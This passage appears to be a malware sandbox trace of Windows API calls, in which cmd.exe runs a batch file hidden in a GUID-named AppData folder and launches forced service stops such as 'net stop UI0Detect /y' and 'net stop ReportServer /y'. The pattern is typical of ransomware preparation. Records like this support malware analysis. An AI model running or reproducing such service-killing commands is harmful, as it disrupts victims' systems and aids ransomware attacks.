0x3e0000 [0202.079] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.079] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.079] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0202.205] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0202.205] CloseHandle (hObject=0x78) returned 1 [0202.205] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0202.205] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0202.205] GetProcessHeap () returned 0x3e0000 [0202.205] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.205] GetEnvironmentStringsW () returned 0x3f8408* [0202.205] GetProcessHeap () returned 0x3e0000 [0202.205] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.205] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.205] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.205] GetProcessHeap () returned 0x3e0000 [0202.205] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.205] GetEnvironmentStringsW () returned 0x3f8408* [0202.206] GetProcessHeap () returned 0x3e0000 [0202.206] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.206] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.206] GetProcessHeap () returned 0x3e0000 [0202.206] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0202.206] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0202.206] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.206] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0202.206] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.206] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0202.206] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.206] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0202.206] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.206] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0202.207] SetConsoleInputExeNameW () returned 0x1 [0202.207] GetConsoleOutputCP () returned 0x1b5 [0202.207] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0202.207] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.207] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0202.207] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0202.207] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.207] SetFilePointer (in: hFile=0x78, lDistanceToMove=3396, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd44 [0202.207] GetProcessHeap () returned 0x3e0000 [0202.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0202.207] GetProcessHeap () returned 0x3e0000 [0202.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0202.207] GetProcessHeap () returned 0x3e0000 [0202.207] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0202.207] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3ff0 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0202.208] GetProcessHeap () returned 0x3e0000 [0202.208] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0202.208] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.208] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd44 [0202.208] ReadFile (in: hFile=0x78, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xb7d, lpOverlapped=0x0) returned 1 [0202.208] SetFilePointer (in: hFile=0x78, lDistanceToMove=3419, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd5b [0202.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=23, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop UI0Detect /y\r\nXEC /y\r\nramework /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 23 [0202.209] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.209] GetFileType (hFile=0x78) returned 0x1 [0202.209] _get_osfhandle (_FileHandle=3) returned 0x78 [0202.209] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd5b [0202.209] GetProcessHeap () returned 0x3e0000 [0202.209] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0202.209] GetProcessHeap () returned 0x3e0000 [0202.209] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0202.212] _tell (_FileHandle=3) returned 3419 [0202.212] _close (_FileHandle=3) returned 0 [0202.212] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0202.212] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0202.212] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0202.212] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0202.212] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0202.212] _wcsicmp (_String1="net", _String2="CD") returned 11 [0202.212] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0202.212] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0202.212] _wcsicmp (_String1="net", _String2="REN") returned -4 [0202.212] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0202.212] _wcsicmp (_String1="net", _String2="SET") returned -5 [0202.212] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0202.212] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0202.212] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0202.212] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0202.212] _wcsicmp (_String1="net", _String2="MD") returned 1 [0202.212] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0202.213] _wcsicmp (_String1="net", _String2="RD") returned -4 [0202.213] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0202.213] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0202.213] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0202.213] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0202.213] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0202.213] _wcsicmp (_String1="net", _String2="CALL") returned 11 [0202.213] _wcsicmp (_String1="net", _String2="VERIFY") returned -8 [0202.213] _wcsicmp (_String1="net", _String2="VER") returned -8 [0202.213] _wcsicmp (_String1="net", _String2="VOL") returned -8 [0202.213] _wcsicmp (_String1="net", _String2="EXIT") returned 9 [0202.213] _wcsicmp (_String1="net", _String2="SETLOCAL") returned -5 [0202.213] _wcsicmp (_String1="net", _String2="ENDLOCAL") returned 9 [0202.213] _wcsicmp (_String1="net", _String2="TITLE") returned -6 [0202.213] _wcsicmp (_String1="net", _String2="START") returned -5 [0202.213] _wcsicmp (_String1="net", _String2="DPATH") returned 10 [0202.213] _wcsicmp (_String1="net", _String2="KEYS") returned 3 [0202.213] _wcsicmp (_String1="net", _String2="MOVE") returned 1 [0202.213] _wcsicmp (_String1="net", _String2="PUSHD") returned -2 [0202.213] _wcsicmp (_String1="net", _String2="POPD") returned -2 [0202.213] _wcsicmp (_String1="net", _String2="ASSOC") returned 13 [0202.213] _wcsicmp (_String1="net", _String2="FTYPE") returned 8 [0202.213] _wcsicmp (_String1="net", _String2="BREAK") returned 12 [0202.213] _wcsicmp (_String1="net", _String2="COLOR") returned 11 [0202.213] _wcsicmp (_String1="net", _String2="MKLINK") returned 1 [0202.213] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6cf8, lpFilePart=0x3bf050 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3bf050*="Desktop") returned 0x25 [0202.214] SetErrorMode (uMode=0x0) returned 0x1 [0202.214] GetProcessHeap () returned 0x3e0000 [0202.214] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6cf0, Size=0x5c) returned 0x3f6cf0 [0202.214] GetProcessHeap () returned 0x3e0000 [0202.214] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6cf0) returned 0x5c [0202.214] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.214] GetProcessHeap () returned 0x3e0000 [0202.214] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f4a80 [0202.214] GetProcessHeap () returned 0x3e0000 [0202.214] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f6d58 [0202.214] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.215] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.215] GetLastError () returned 0x2 [0202.215] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.215] GetLastError () returned 0x2 [0202.216] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.216] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.216] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.217] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0xffffffff [0202.217] GetLastError () returned 0x2 [0202.217] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3bedcc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3bedcc) returned 0x3f8278 [0202.217] FindClose (in: hFindFile=0x3f8278 | out: hFindFile=0x3f8278) returned 1 [0202.218] GetConsoleTitleW (in: lpConsoleTitle=0x3bee1c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.218] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x3f6e90, lpFilePart=0x3be93c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x3be93c*="Desktop") returned 0x25 [0202.218] SetErrorMode (uMode=0x0) returned 0x1 [0202.218] GetProcessHeap () returned 0x3e0000 [0202.218] RtlReAllocateHeap (Heap=0x3e0000, Flags=0x0, Ptr=0x3f6e88, Size=0x5c) returned 0x3f6e88 [0202.218] GetProcessHeap () returned 0x3e0000 [0202.218] RtlSizeHeap (HeapHandle=0x3e0000, Flags=0x0, MemoryPointer=0x3f6e88) returned 0x5c [0202.219] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0202.219] GetProcessHeap () returned 0x3e0000 [0202.219] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x120) returned 0x3f6ef0 [0202.219] GetProcessHeap () returned 0x3e0000 [0202.219] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x238) returned 0x3f7018 [0202.219] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.219] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.219] GetLastError () returned 0x2 [0202.220] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\net", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.220] GetLastError () returned 0x2 [0202.220] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0202.221] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.*", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0202.221] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0202.221] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.COM", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0xffffffff [0202.221] GetLastError () returned 0x2 [0202.222] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\net.EXE", fInfoLevelId=0x1, lpFindFileData=0x3be6b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x3be6b8) returned 0x3f3ff0 [0202.222] FindClose (in: hFindFile=0x3f3ff0 | out: hFindFile=0x3f3ff0) returned 1 [0202.222] GetConsoleTitleW (in: lpConsoleTitle=0x3bebb0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0202.222] InitializeProcThreadAttributeList (in: lpAttributeList=0x3bea38, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x3beb00 | out: lpAttributeList=0x3bea38, lpSize=0x3beb00) returned 1 [0202.222] UpdateProcThreadAttribute (in: lpAttributeList=0x3bea38, dwFlags=0x0, Attribute=0x60001, lpValue=0x3beaf8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x3bea38, lpPreviousValue=0x0) returned 1 [0202.222] GetStartupInfoW (in: lpStartupInfo=0x3be9f4 | out: lpStartupInfo=0x3be9f4*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x264, hStdError=0x26c)) [0202.223] lstrcmpW (lpString1="\\net.exe", lpString2="\\XCOPY.EXE") returned -1 [0202.223] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\net.exe", lpCommandLine="net stop UI0Detect /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x3bea94*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="net stop UI0Detect /y", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x3beae0 | out: lpCommandLine="net stop UI0Detect /y", lpProcessInformation=0x3beae0*(hProcess=0x74, hThread=0x78, dwProcessId=0xb54, dwThreadId=0xb60)) returned 1 [0202.227] CloseHandle (hObject=0x78) returned 1 [0202.227] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0202.227] GetProcessHeap () returned 0x3e0000 [0202.227] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.227] GetEnvironmentStringsW () returned 0x3f8408* [0202.227] GetProcessHeap () returned 0x3e0000 [0202.227] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.227] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.227] WaitForSingleObject (hHandle=0x74, dwMilliseconds=0xffffffff) returned 0x0 [0202.371] GetExitCodeProcess (in: hProcess=0x74, lpExitCode=0x3be9d4 | out: lpExitCode=0x3be9d4*=0x2) returned 1 [0202.372] CloseHandle (hObject=0x74) returned 1 [0202.372] _vsnwprintf (in: _Buffer=0x3beb1c, _BufferCount=0x13, _Format="%08X", _ArgList=0x3be9e0 | out: _Buffer="00000002") returned 8 [0202.372] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000002") returned 1 [0202.372] GetProcessHeap () returned 0x3e0000 [0202.372] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.372] GetEnvironmentStringsW () returned 0x3f8408* [0202.372] GetProcessHeap () returned 0x3e0000 [0202.372] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.372] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.372] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0202.372] GetProcessHeap () returned 0x3e0000 [0202.373] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8f70 | out: hHeap=0x3e0000) returned 1 [0202.373] GetEnvironmentStringsW () returned 0x3f8408* [0202.373] GetProcessHeap () returned 0x3e0000 [0202.373] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0xb5c) returned 0x3f8f70 [0202.373] FreeEnvironmentStringsW (penv=0x3f8408) returned 1 [0202.373] GetProcessHeap () returned 0x3e0000 [0202.373] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a70 | out: hHeap=0x3e0000) returned 1 [0202.373] DeleteProcThreadAttributeList (in: lpAttributeList=0x3bea38 | out: lpAttributeList=0x3bea38) [0202.373] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.373] SetConsoleMode (hConsoleHandle=0x264, dwMode=0x0) returned 0 [0202.373] _get_osfhandle (_FileHandle=1) returned 0x264 [0202.373] GetConsoleMode (in: hConsoleHandle=0x264, lpMode=0x4a9841ac | out: lpMode=0x4a9841ac) returned 0 [0202.373] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.373] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4a9841b0 | out: lpMode=0x4a9841b0) returned 1 [0202.374] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0202.374] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0202.374] SetConsoleInputExeNameW () returned 0x1 [0202.374] GetConsoleOutputCP () returned 0x1b5 [0202.374] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a984260 | out: lpCPInfo=0x4a984260) returned 1 [0202.374] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.374] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\{7BC215DC-ADE3-41CE-9940-63296E9C3DD5}\\c48c75d7__.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\{7bc215dc-ade3-41ce-9940-63296e9c3dd5}\\c48c75d7__.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x3bf254, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0202.374] _open_osfhandle (_OSFileHandle=0x74, _Flags=8) returned 3 [0202.374] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.374] SetFilePointer (in: hFile=0x74, lDistanceToMove=3419, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd5b [0202.374] GetProcessHeap () returned 0x3e0000 [0202.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7148 | out: hHeap=0x3e0000) returned 1 [0202.374] GetProcessHeap () returned 0x3e0000 [0202.374] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f7018 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6ef0 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6e88 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f8278 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4ba8 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f81f8 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6d58 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f4a80 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6cf0 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3e1290 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f6a58 | out: hHeap=0x3e0000) returned 1 [0202.375] GetProcessHeap () returned 0x3e0000 [0202.375] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3f3f90 | out: hHeap=0x3e0000) returned 1 [0202.375] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.375] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd5b [0202.375] ReadFile (in: hFile=0x74, lpBuffer=0x4a986640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x3bf238, lpOverlapped=0x0 | out: lpBuffer=0x4a986640*, lpNumberOfBytesRead=0x3bf238*=0xb66, lpOverlapped=0x0) returned 1 [0202.375] SetFilePointer (in: hFile=0x74, lDistanceToMove=3445, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xd75 [0202.375] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a986640, cbMultiByte=26, lpWideCharStr=0x4a98c640, cchWideChar=8191 | out: lpWideCharStr="net stop ReportServer /y\r\n /y\r\nramework /y\r\neΓÇ¥ /y\r\nures\r\nnded\r\n") returned 26 [0202.376] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.376] GetFileType (hFile=0x74) returned 0x1 [0202.376] _get_osfhandle (_FileHandle=3) returned 0x74 [0202.376] SetFilePointer (in: hFile=0x74, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xd75 [0202.376] GetProcessHeap () returned 0x3e0000 [0202.376] RtlAllocateHeap (HeapHandle=0x3e0000, Flags=0x8, Size=0x400a) returned 0x3fdad8 [0202.376] GetProcessHeap () returned 0x3e0000 [0202.376] HeapFree (in: hHeap=0x3e0000, dwFlags=0x0, lpMem=0x3fdad8 | out: hHeap=0x3e0000) returned 1 [0202.379] _tell (_FileHandle=3) returned 3445 [0202.379] _close (_FileHandle=3) returned 0 [0202.379] _wcsicmp (_String1="net", _String2="DIR") returned 10 [0202.379] _wcsicmp (_String1="net", _String2="ERASE") returned 9 [0202.379] _wcsicmp (_String1="net", _String2="DEL") returned 10 [0202.379] _wcsicmp (_String1="net", _String2="TYPE") returned -6 [0202.379] _wcsicmp (_String1="net", _String2="COPY") returned 11 [0202.379] _wcsicmp (_String1="net", _String2="CD") returned 11 [0202.379] _wcsicmp (_String1="net", _String2="CHDIR") returned 11 [0202.379] _wcsicmp (_String1="net", _String2="RENAME") returned -4 [0202.379] _wcsicmp (_String1="net", _String2="REN") returned -4 [0202.379] _wcsicmp (_String1="net", _String2="ECHO") returned 9 [0202.379] _wcsicmp (_String1="net", _String2="SET") returned -5 [0202.379] _wcsicmp (_String1="net", _String2="PAUSE") returned -2 [0202.379] _wcsicmp (_String1="net", _String2="DATE") returned 10 [0202.379] _wcsicmp (_String1="net", _String2="TIME") returned -6 [0202.379] _wcsicmp (_String1="net", _String2="PROMPT") returned -2 [0202.380] _wcsicmp (_String1="net", _String2="MD") returned 1 [0202.380] _wcsicmp (_String1="net", _String2="MKDIR") returned 1 [0202.380] _wcsicmp (_String1="net", _String2="RD") returned -4 [0202.380] _wcsicmp (_String1="net", _String2="RMDIR") returned -4 [0202.380] _wcsicmp (_String1="net", _String2="PATH") returned -2 [0202.380] _wcsicmp (_String1="net", _String2="GOTO") returned 7 [0202.380] _wcsicmp (_String1="net", _String2="SHIFT") returned -5 [0202.380] _wcsicmp (_String1="net", _String2="CLS") returned 11 [0202.380] _wcsicmp (_String1="net", 